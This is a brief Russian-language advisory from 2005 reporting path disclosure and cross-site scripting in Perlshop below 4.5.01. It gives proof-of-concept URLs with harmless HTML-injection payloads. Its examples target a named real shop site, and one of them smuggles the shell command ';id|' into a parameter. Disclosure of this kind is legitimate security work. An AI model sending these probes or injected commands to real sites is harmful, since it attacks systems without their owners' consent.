Software: Perlshop < 4.5.01
Vendor: Waverider Systems www.WaveriderSystems.com
Vulnerability: раскрытие инсталяционного пути и межсайтовый скриптинг
Risk: низкий
Date: 19.12.2005
discovered by durito -durito[at]mail[dot]ru-
HTTP: www.lwb57.org
Раскрытие версии скрипта:
http://www.xxx.com/cgi-bin/store/perlshop.cgi/*
Раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop.cgi?action= ENTER&thispage=1&ORDER_ID=!ORDERID!
вставляем любой символ в параметр thispage.
Альтернативное раскрытие инсталяционного пути:
http://www.xxx.com/cgi-bin/store/perlshop.cgi?action= ENTER&thispage=durito.html&ORDER_ID=!ORDERID!
В параметре thispage запрашиваем любой несуществующий файл, например
durito.html и смотрим исходный код страницы:
<h3 align="center">The page (/home/studios/public_html/catalog/1.html) you
have requested is not available.</h3>
Межсайтовый скриптинг:
http://www.xxx.com/cgi-bin/store/perlshop.cgi?action=<h1>Hello</h1>
http://www.xxx.com/cgi-bin/store/perlshop.cgi?ORDER_ID=<h1>Hello</h1>
Так же межсайтовый скриптинг возможен в системе поиска Perlshop.
Примеры:
http://www.hollywoodcostumesandparty.com/cgi-bin/ store/perlshop.cgi/*
http://hollywoodcostumesandparty.com/cgi-bin/store/ perlshop.cgi?action=ENTER&thispage=1&ORDER_ID=!ORDERID!
http://hollywoodcostumesandparty.com/cgi-bin/store/ perlshop.cgi?action=ENTER&thispage=1.html&ORDER_ID=!ORDERID!
http://www.hollywoodcostumesandparty.com/cgi-bin/ store/perlshop.cgi?ORDER_ID=%3Ch1%3EHello%3C/h1%3E
http://hollywoodcostumesandparty.com/cgi-bin/store/ perlshop.cgi?action=%3Ch1%3EHello%3C/h1%3E&
thispage=;id|&ORDER_ID=!ORDERID!
